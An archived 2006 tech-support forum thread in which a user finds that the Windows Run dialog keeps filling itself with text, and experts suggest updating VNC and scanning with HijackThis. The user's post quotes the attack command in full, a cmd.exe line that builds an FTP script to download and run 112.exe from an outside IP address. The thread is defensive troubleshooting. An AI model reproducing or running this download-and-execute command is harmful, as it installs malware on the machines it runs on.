Solved

Run window being auto populated by someone/thing else

Posted on 2006-11-05
4
271 Views
Last Modified: 2013-12-04
Hello

I have a question : at random intervals the run window from start>Run pops up and starts populating with text that tries to do something

This is the command line :

cmd.exe /c del i&echo open 81.208.83.216 7085 > i&echo user 1 1 >> i &echo get 112.exe >> i &echo quit >> i &ftp -n -s:i &112.exe&del i&exit

I downloaded these programs against  rootkit : Sophos anti rootkit, rootkit revealer and Novatix cyberhawk.
Sophos scan didnt find out anything, so did cyberhawk. I dont understand the rootkit revealer log.
I do use VNC viewer 4.1
I also have spyware doctor, spyware blaster, registry mechanic and AVG AV with firewall.
Help would be very appreciated
0
Comment
Question by:calvinnhobbes
  • 2
4 Comments
 
LVL 38

Accepted Solution

by:
Rich Rumble earned 500 total points
ID: 17877953
0
 
LVL 26

Expert Comment

by:DireOrbAnt
ID: 17878746
Yes, you need to update your VNC. However, you probably have some trojan on your computer already.
So run something like HijackThis:
http://www.spywareinfo.com/~merijn/programs.php#hijackthis

And remove anything suspicious. Do this after upgrading VNC.
0
 
LVL 38

Expert Comment

by:Rich Rumble
ID: 17899000
What was the solution ultimately to your issue? Did kaspersky detect this, if so, what was the name it came up with? i think this info can help others that are having these issues.
Thanks!
-rich
0
 

Author Comment

by:calvinnhobbes
ID: 17899701
kaspersky didnt find anything, but i have done the upgrade from the free version to the professional version of VNC viewer and the  problem has gone. Hijackthis didnt find anything as well. I'm still afraid that the trojan or whatever is still in my system.
davide
0

Featured Post

Courses: Start Training Online With Pros, Today

Brush up on the basics or master the advanced techniques required to earn essential industry certifications, with Courses. Enroll in a course and start learning today. Training topics range from Android App Dev to the Xen Virtualization Platform.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Recently, a new law in my state forced us to get a top-to-bottom analysis of all of our contract client's networks. While we have documentation, it was spotty at best for some - and in any event it needed to be checked against reality. That was m…
Users of Windows 10 Professional can disable automatic reboots using the policy editor. This tool is not included in the Windows home edition. But don't worry! Follow the instructions below to install (a Win7) policy editor on your Windows 10 Home e…
Internet Business Fax to Email Made Easy - With eFax Corporate (http://www.enterprise.efax.com), you'll receive a dedicated online fax number, which is used the same way as a typical analog fax number. You'll receive secure faxes in your email, fr…
Microsoft Active Directory, the widely used IT infrastructure, is known for its high risk of credential theft. The best way to test your Active Directory’s vulnerabilities to pass-the-ticket, pass-the-hash, privilege escalation, and malware attacks …

813 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

18 Experts available now in Live!

Get 1:1 Help Now